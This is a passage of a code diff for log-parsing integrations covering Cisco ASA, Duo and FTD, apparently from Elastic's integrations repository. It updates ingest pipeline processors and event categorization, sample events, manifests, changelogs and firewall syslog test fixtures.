_ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Normalize protocol names @@ -1871,6 +1719,7 @@ processors: # - script: if: "ctx?.network?.transport != null" + tag: script_process_iana_number lang: painless params: icmp: 1 @@ -1912,32 +1761,21 @@ processors: net['iana_number'] = net.transport; net['transport'] = trans; } + - set: + field: "network.transport" + if: 'ctx.network?.transport == "icmpv6"' + value: "ipv6-icmp" + # # Normalize event.outcome # - lowercase: - field: "event.outcome" + field: "_temp_.outcome" ignore_missing: true - - set: - field: "event.outcome" - if: 'ctx.event?.outcome == "est-allowed"' - value: "allowed" - - set: - field: "event.outcome" - if: 'ctx.event?.outcome == "permitted"' - value: "allowed" - - set: - field: "event.outcome" - if: 'ctx.event?.outcome == "allow"' - value: allowed - - set: + - lowercase: field: "event.outcome" - if: 'ctx.event?.outcome == "deny"' - value: denied - - set: - field: "network.transport" - if: 'ctx.network?.transport == "icmpv6"' - value: "ipv6-icmp" + ignore_missing: true + # # Convert numeric fields to integer or long, as output of dissect and kv processors is always a string # @@ -1946,149 +1784,81 @@ processors: tag: "convert_source_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: destination.port tag: "convert_destination_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: source.bytes tag: "convert_source_bytes" type: long ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: destination.bytes tag: "convert_destination_bytes" type: long ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: network.bytes tag: "convert_network_bytes" type: long ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: source.packets tag: "convert_source_packets" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: destination.packets tag: "convert_destination_packets" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: _temp_.cisco.mapped_source_port tag: "convert_mapped_source_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.mapped_destination_port tag: "convert_mapped_destination_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.icmp_code tag: "convert_icmp_code" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: _temp_.cisco.icmp_type tag: "convert_icmp_type" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: _temp_.cisco.original_iana_number tag: "convert_original_iana_number" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: http.response.status_code tag: "convert_http_resp_status_code" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: file.size tag: "convert_file_size" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: network.iana_number tag: "convert_iana_number" type: string ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - convert: field: sip.to.uri.port tag: "convert_sip_to_uri_port" type: integer ignore_missing: true - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" # # Assign ECS .ip fields from .address is a valid IP address is found, @@ -2100,44 +1870,24 @@ processors: tag: "grok_source_address" patterns: - "^(?:%{IP:source.ip}|%{GREEDYDATA:source.domain})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: destination.address if: ctx.destination?.address != null tag: "grok_destination_address" patterns: - "^(?:%{IP:destination.ip}|%{GREEDYDATA:destination.domain})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: client.address if: ctx.client?.address != null tag: "grok_client_address" patterns: - "^(?:%{IP:client.ip}|%{GREEDYDATA:client.domain})$" - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - grok: field: server.address if: ctx.server?.address != null tag: "grok_server_address" patterns: - "^(?:%{IP:server.ip}|%{GREEDYDATA:server.domain})$" - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" # # Geolocation for source and destination addresses # @@ -2193,24 +1943,12 @@ processors: tag: "grok_natsrcip" patterns: - "^(?:%{IP:_temp_.cisco.mapped_source_ip}|%{GREEDYDATA:_temp_.cisco.mapped_source_host})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: _temp_.natdstip if: ctx._temp_?.natdstip != null tag: "grok_natdstip" patterns: - "^(?:%{IP:_temp_.cisco.mapped_destination_ip}|%{GREEDYDATA:_temp_.cisco.mapped_destination_host})$" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # NAT fields # @@ -2218,38 +1956,46 @@ processors: # This populates both nat.ip and nat.port only when some translation is done. # Fills nat.ip and nat.port even when only the ip or port changed. - set: + tag: set_source_nat_ip field: source.nat.ip value: "{{{_temp_.cisco.mapped_source_ip}}}" if: "ctx?._temp_?.cisco?.mapped_source_ip != ctx?.source?.ip" ignore_empty_value: true - convert: + tag: convert_source_nat_ip field: source.nat.ip type: ip ignore_missing: true - set: + tag: set_source_nat_port field: source.nat.port value: "{{{_temp_.cisco.mapped_source_port}}}" if: "ctx?._temp_?.cisco?.mapped_source_port != ctx?.source?.port" ignore_empty_value: true - convert: + tag: convert_source_nat_port field: source.nat.port type: long ignore_missing: true - set: + tag: set_destination_nat_ip field: destination.nat.ip value: "{{{_temp_.cisco.mapped_destination_ip}}}" if: "ctx?._temp_?.cisco.mapped_destination_ip != ctx?.destination?.ip" ignore_empty_value: true - convert: + tag: convert_destination_nat_ip field: destination.nat.ip type: ip ignore_missing: true - set: + tag: set_destination_nat_port field: destination.nat.port value: "{{{_temp_.cisco.mapped_destination_port}}}" if: "ctx?._temp_?.cisco?.mapped_destination_port != ctx?.destination?.port" ignore_empty_value: true - convert: + tag: convert_destination_nat_port field: destination.nat.port type: long ignore_missing: true @@ -2327,10 +2073,6 @@ processors: field: url.original tag: "uriparts_url_original" if: ctx.url?.original != null - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" - append: field: url.domain value: "{{{_temp_.url_domain}}}" @@ -2351,14 +2093,7 @@ processors: field: _temp_.cisco target_field: "cisco.asa" if: ctx._temp_?.cisco != null - # - # Remove temporary fields - # - - remove: - field: - - _temp_ - - _conf - ignore_missing: true + # # Rename some 7.x fields # @@ -2368,154 +2103,331 @@ processors: ignore_missing: true # ECS categorization - script: + tag: script_ecs_categorization lang: painless + description: >- + This script will set the ECS event categorization fields for each + message type. If a message wrote to _temp_.outcome, the value of this + field will be used to conditionally set the ECS event fields. + The top-level keys are the Cisco message IDs. The next level of keys are + either the ECS event fields or in the case of _temp_.outcome being set, + the possible values of _temp_.outcome. In the latter case, the keys + contained within will be the ECS event fields. params: - connection-finished: - kind: event - category: - - network - type: - - end - connection-started: - kind: event - category: - - network - type: - - start - file-detected: - kind: alert - category: - - malware - type: - - info - firewall-rule: - kind: event - category: - - network - type: [] - flow-creation: - kind: event - category: - - network - type: - - connection - - start - flow-expiration: - kind: event - category: - - network - type: - - connection - - end - intrusion-detected: - kind: alert - category: - - intrusion_detection - type: - - info - logged-in: - kind: event - category: - - authentication - - network - type: ['allowed', 'info'] - logon-failed: - kind: event - category: - - authentication - - network - type: ['denied', 'info'] - malware-detected: - kind: alert - category: - - malware - type: - - info - bypass: - kind: event - category: - - network - type: - - info - error: - kind: event + "106001": + type: [ connection, denied ] + outcome: success + "106002": + type: [ connection, denied ] + outcome: success + "106006": + type: [ connection, denied ] + outcome: success + "106007": + type: [ connection, denied ] + outcome: success + "106010": + type: [ connection, denied ] + outcome: success + "106013": + type: [ connection, denied ] + outcome: success + "106014": + type: [ connection, denied ] + outcome: success + "106015": + type: [ connection, denied ] + outcome: success + "106016": + type: [ connection, denied ] + outcome: success + "106017": + type: [ connection, denied ] + outcome: success + "106018": + type: [ connection, denied ] + outcome: success + "106020": + type: [ connection, denied ] + outcome: success + "106021": + type: [ connection, denied ] + outcome: success + "106022": + type: [ connection, denied ] + outcome: success + "106023": + type: [ connection, denied ] + outcome: success + "106027": + type: [ connection, denied ] + outcome: success + "106100": + denied: + type: [ connection, denied ] + action: firewall-rule + outcome: success + permitted: + type: [ connection, allowed ] + action: firewall-rule + outcome: success + est-allowed: + type: [ connection, allowed ] + action: firewall-rule + outcome: success + "106102": + denied: + type: [ connection, denied ] + action: firewall-rule + outcome: success + permitted: + type: [ connection, allowed ] + action: firewall-rule + outcome: success + "106103": + type: [ connection, denied ] + outcome: success + "110002": + type: [ connection, denied ] + outcome: failure + "111004": + failed: + outcome: failure + ok: + outcome: success + "113004": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "113005": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "113012": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "113019": + type: [ connection, end ] + action: client-vpn-disconnected + "113021": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "113029": + type: [ connection, denied ] + action: client-vpn-error + "113030": + type: [ connection, denied ] + action: client-vpn-error + "113031": + type: [ connection, denied ] + action: client-vpn-error + "113032": + type: [ connection, denied ] + action: client-vpn-error + "113033": + type: [ connection, denied ] + action: client-vpn-error + "113034": + type: [ connection, denied ] + action: client-vpn-error + "113035": + type: [ connection, denied ] + action: client-vpn-error + "113036": + type: [ connection, denied ] + action: client-vpn-error + "113037": + type: [ connection, denied ] + action: client-vpn-error + "113038": + type: [ connection, denied ] + action: client-vpn-error + "113039": + category: [ network, session ] + type: [ connection, start ] + action: client-vpn-connected + "113040": + type: [ connection, denied ] + action: client-vpn-error + "302014": + type: [ connection, end ] + action: flow-expiration + "302016": + type: [ connection, end ] + action: flow-expiration + "302018": + type: [ connection, end ] + action: flow-expiration + outcome: success + "302020": + type: [ connection, start ] + action: flow-creation + "302021": + type: [ connection, end ] + action: flow-expiration + "302036": + type: [ connection, end ] + action: flow-expiration + "302304": + type: [ connection, end ] + action: flow-expiration + "302306": + type: [ connection, end ] + action: flow-expiration + "304001": + type: [ connection, allowed ] + outcome: success + "304002": + type: [ connection, denied ] + outcome: success + "305012": + type: [ connection, end ] + action: flow-expiration + "313001": + type: [ connection, denied ] + outcome: success + "313004": + type: [ connection, denied ] + outcome: success + "313008": + type: [ connection, denied ] + outcome: success + "313009": + type: [ connection, denied ] + outcome: success + "322001": + type: [ connection, denied ] + "338001": + type: [ connection ] + "338002": + type: [ connection, allowed ] + outcome: success + "338003": + type: [ connection ] + "338004": + category: [ network, intrusion_detection ] + outcome: success + "338005": + type: [ connection ] + "338006": + type: [ connection ] + "338007": + type: [ connection ] + "338008": + type: [ connection, denied ] + outcome: failure + "338101": + type: [ connection ] + "338102": + type: [ connection ] + "338103": + type: [ connection ] + "338104": + type: [ connection ] + "338201": + type: [ connection ] + "338202": + type: [ connection ] + "338203": + type: [ connection ] + "338204": + type: [ connection, denied ] + outcome: failure + "338301": + type: [ connection ] + "434002": + type: [ connection, denied ] + action: drop + outcome: unknown + "434004": + action: bypass + outcome: unknown + "502103": + category: [ iam ] + type: [ group, change ] + "602303": + type: [ connection, start ] + action: created + outcome: success + "602304": + type: [ info, end ] + action: deleted + outcome: success + "605004": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed outcome: failure - category: - - network - type: - - info - deleted: - kind: event - category: - - network - type: - - info - - end - creation: - kind: event - category: - - network - type: - - info - - access - client-vpn-connected: - kind: event - category: - - network - - session - type: - - connection - - start - client-vpn-error: - kind: event - category: - - network - type: - - connection - - denied - client-vpn-disconnected: - kind: event - category: - - network - type: - - connection - - end + "605005": + type: [ connection, allowed ] + outcome: success + "609001": + type: [ connection, end ] + action: flow-expiration + "609002": + type: [ connection, end ] + action: flow-expiration + "611101": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "611102": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "710003": + type: [ connection, denied ] + outcome: success + "710005": + type: [ connection, denied ] + outcome: failure + "713120": + outcome: success + "713901": + action: error + outcome: failure + "713902": + action: error + outcome: failure + "713903": + outcome: failure + "713904": + action: error + outcome: failure + "713905": + action: error + outcome: failure + "716039": + category: [ authentication, network ] + type: [ denied, info ] + action: logon-failed + outcome: failure + "734001": + category: [ authentication, network ] + type: [ allowed, info ] + action: logged-in + outcome: success + "750002": + type: [ start, connection ] + action: connection-started + "750003": + action: error source: >- - if (ctx?.event?.action == null || !params.containsKey(ctx.event.action)) { - return; - } - - ctx.event.kind = params.get(ctx.event.action).get('kind'); - ctx.event.category = params.get(ctx.event.action).get('category').clone(); - ctx.event.type = params.get(ctx.event.action).get('type').clone(); - if (ctx?.event?.outcome == null || (!ctx.event.category.contains('network') && !ctx.event.category.contains('intrusion_detection'))) { - if (ctx?.event?.action == 'firewall-rule') { - ctx.event.type.add('info'); - } else if (ctx?.event?.action.startsWith('connection-')) { - ctx.event.type.add('connection'); - } + if (ctx.event.code == null || !params.containsKey(ctx.event.code)) { return; } - if (ctx.event.outcome == 'allowed') { - ctx.event.outcome = 'success'; - ctx.event.type.add('connection'); - ctx.event.type.add('allowed'); - } else if (ctx.event.outcome == 'denied' || ctx.event.outcome == 'block') { - ctx.event.outcome = 'success'; - ctx.event.type.add('connection'); - ctx.event.type.add('denied'); - } else if (ctx.event.outcome == 'dropped') { - ctx.event.outcome = 'failure'; - ctx.event.type.add('connection'); - ctx.event.type.add('denied'); - } else if (ctx?.event?.action == 'firewall-rule') { - ctx.event.type.add('info'); - } else if (ctx?.event?.action.startsWith('connection-')) { - ctx.event.type.add('connection'); - } - if (ctx.event.outcome == 'monitored') { - ctx.event.category.add('intrusion_detection'); - ctx.event.outcome = 'success'; + if (ctx._temp_?.outcome == null) { + params.get(ctx.event.code).forEach((k, v) -> ctx.event[k] = v); + } else { + params.get(ctx.event.code).get(ctx._temp_.outcome).forEach((k, v) -> ctx.event[k] = v); } # Malware event kind is classified as alert when sha_disposition is "Malware", "Custom Detection" not for other cases. @@ -2543,15 +2455,12 @@ processors: - set: field: observer.vendor value: "Cisco" - ignore_empty_value: true - set: field: observer.type value: "firewall" - ignore_empty_value: true - set: field: observer.product value: "asa" - ignore_empty_value: true - set: field: observer.egress.interface.name value: "{{{ cisco.asa.destination_interface }}}" @@ -2636,6 +2545,7 @@ processors: if: ctx.destination?.user?.domain != null && ctx.destination?.user?.domain != '' allow_duplicates: false - script: + tag: script_remove_null_values lang: painless description: This script processor iterates over the whole document to remove fields with null values. source: | @@ -2675,6 +2585,12 @@ processors: if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true ignore_missing: true + - remove: + field: + - _temp_ + - _conf + ignore_missing: true + on_failure: # Copy any fields under _temp_.cisco to its final destination. Those can help # with diagnosing the failure. @@ -2692,5 +2608,5 @@ on_failure: field: event.kind value: pipeline_error - append: - field: "error.message" - value: "{{{ _ingest.on_failure_message }}}" + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/cisco_asa/data_stream/log/sample_event.json b/packages/cisco_asa/data_stream/log/sample_event.json index 0091d612d34..cbb3f7106cc 100644 --- a/packages/cisco_asa/data_stream/log/sample_event.json +++ b/packages/cisco_asa/data_stream/log/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2018-10-10T12:34:56.000Z", "agent": { - "ephemeral_id": "9ff3fcbd-3ca0-4634-bbaa-604ac67b8188", - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "ephemeral_id": "3e750a6f-0315-4d23-b673-90c997a5320b", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.3" + "version": "8.11.4" }, "cisco": { "asa": { @@ -28,9 +28,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "snapshot": false, - "version": "8.10.3" + "version": "8.11.4" }, "event": { "action": "firewall-rule", @@ -40,7 +40,7 @@ ], "code": "305011", "dataset": "cisco_asa.log", - "ingested": "2023-10-17T09:19:55Z", + "ingested": "2024-02-22T13:07:31Z", "kind": "event", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "severity": 6, @@ -53,12 +53,12 @@ "hostname": "localhost" }, "input": { - "type": "tcp" + "type": "udp" }, "log": { "level": "informational", "source": { - "address": "192.168.208.4:60290" + "address": "172.18.0.7:33197" } }, "network": { @@ -106,4 +106,4 @@ "cisco-asa", "forwarded" ] -} +} \ No newline at end of file diff --git a/packages/cisco_asa/docs/README.md b/packages/cisco_asa/docs/README.md index cc209e794fe..b267c02ca7a 100644 --- a/packages/cisco_asa/docs/README.md +++ b/packages/cisco_asa/docs/README.md @@ -17,11 +17,11 @@ An example event for `log` looks as following: { "@timestamp": "2018-10-10T12:34:56.000Z", "agent": { - "ephemeral_id": "9ff3fcbd-3ca0-4634-bbaa-604ac67b8188", - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "ephemeral_id": "3e750a6f-0315-4d23-b673-90c997a5320b", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.3" + "version": "8.11.4" }, "cisco": { "asa": { @@ -44,9 +44,9 @@ An example event for `log` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "383c6290-eea2-4a18-8adf-2ed05723031e", + "id": "38e64915-8382-4988-ab00-33b6b749dcdb", "snapshot": false, - "version": "8.10.3" + "version": "8.11.4" }, "event": { "action": "firewall-rule", @@ -56,7 +56,7 @@ An example event for `log` looks as following: ], "code": "305011", "dataset": "cisco_asa.log", - "ingested": "2023-10-17T09:19:55Z", + "ingested": "2024-02-22T13:07:31Z", "kind": "event", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "severity": 6, @@ -69,12 +69,12 @@ An example event for `log` looks as following: "hostname": "localhost" }, "input": { - "type": "tcp" + "type": "udp" }, "log": { "level": "informational", "source": { - "address": "192.168.208.4:60290" + "address": "172.18.0.7:33197" } }, "network": { @@ -123,7 +123,6 @@ An example event for `log` looks as following: "forwarded" ] } - ``` **Exported fields** diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml index 4b5400b8930..72107b5b429 100644 --- a/packages/cisco_asa/manifest.yml +++ b/packages/cisco_asa/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_asa title: Cisco ASA -version: "2.30.1" +version: "2.33.0" description: Collect logs from Cisco ASA with Elastic Agent. type: integration categories: diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml index cea1bb9005d..e7d4afdeafb 100644 --- a/packages/cisco_duo/changelog.yml +++ b/packages/cisco_duo/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.22.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.21.1" changes: - description: Changed owners diff --git a/packages/cisco_duo/manifest.yml b/packages/cisco_duo/manifest.yml index 2c4242a6e2a..eaf1cf4f6b0 100644 --- a/packages/cisco_duo/manifest.yml +++ b/packages/cisco_duo/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_duo title: Cisco Duo -version: "1.21.1" +version: "1.22.0" description: Collect logs from Cisco Duo with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - iam conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/cisco_duo-screenshot.png title: Cisco Duo authentication log dashboard @@ -49,6 +49,7 @@ policy_templates: title: Secret Key description: Secret key for the Cisco Duo Admin API. required: true + secret: true - name: interval type: text title: Interval diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml index ce74da81dd3..9103eb72852 100644 --- a/packages/cisco_ftd/changelog.yml +++ b/packages/cisco_ftd/changelog.yml @@ -1,4 +1,39 @@ # newer versions go on top +- version: "3.2.4" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9569 +- version: "3.2.3" + changes: + - description: Treat FTD suffix as optional + type: bugfix + link: https://github.com/elastic/integrations/issues/9241 +- version: "3.2.2" + changes: + - description: Handle null network when calculating bytes for Event 113019 + type: bugfix + link: https://github.com/elastic/integrations/issues/9198 +- version: "3.2.1" + changes: + - description: support hidden username for message id 113005 + type: bugfix + link: https://github.com/elastic/integrations/pull/9473 +- version: "3.2.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "3.1.3" + changes: + - description: Expand grok patterns to handle TCP Probes for 302013, 302014 messages + type: enhancement + link: https://github.com/elastic/integrations/pull/9223 +- version: "3.1.2" + changes: + - description: Null handling and other clean-up + type: bugfix + link: https://github.com/elastic/integrations/pull/9141 - version: "3.1.1" changes: - description: Changed owners diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index d0c80a912bb..809c741fcbe 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -372,7 +372,7 @@ ] }, { - "@timestamp": "2023-05-05T17:51:17.000Z", + "@timestamp": "2024-05-05T17:51:17.000Z", "cisco": { "ftd": { "icmp_code": 1, diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log index 40c1e05dd0e..32f1d43c87b 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log @@ -1,3 +1,5 @@ <166>Sep 29 2022 15:00:15 hosty : %FTD-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF0079F5A) between 192.168.0.139 and 192.168.0.38 (user= 192.168.0.38) has been created. <166>Sep 29 2022 15:00:15 hosty : %FTD-6-602304: IPSEC: An inbound LAN-to-LAN SA (SPI= 0xEAEE970F) between 192.168.0.38 and 192.168.0.139 (user= 192.168.0.38) has been deleted. <166>ACA1a-FW-FTDV01 %FTD-6-113005: AAA user authentication Rejected : reason = AAA failure : server = 192.168.0.38 : user = scan : user IP = 192.168.0.139 +<166>%FTD-6-113005: AAA user authentication Rejected : reason = AAA failure : server = 192.168.0.38 : user = ***** : user IP = 192.168.0.139 +<166>:Feb 26 11:26:52 UTC: %FTD--6-852002: Received Full Proxy to Lightweight event from application Snort for TCP flow 10.10.10.10/710 to 11.22.33.44/47873 diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json index bf2201630f5..6150aad4983 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-fix.log-expected.json @@ -206,6 +206,92 @@ "tags": [ "preserve_original_event" ] + }, + { + "destination": { + "address": "192.168.0.38", + "ip": "192.168.0.38" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "logon-failed", + "code": "113005", + "original": "<166>%FTD-6-113005: AAA user authentication Rejected : reason = AAA failure : server = 192.168.0.38 : user = ***** : user IP = 192.168.0.139", + "outcome": "failure", + "severity": 6, + "timezone": "UTC" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "observer": { + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "192.168.0.139", + "192.168.0.38" + ] + }, + "source": { + "address": "192.168.0.139", + "ip": "192.168.0.139" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "852002", + "kind": "event", + "original": "<166>:Feb 26 11:26:52 UTC: %FTD--6-852002: Received Full Proxy to Lightweight event from application Snort for TCP flow 10.10.10.10/710 to 11.22.33.44/47873", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "observer": { + "product": "ftd", + "type": 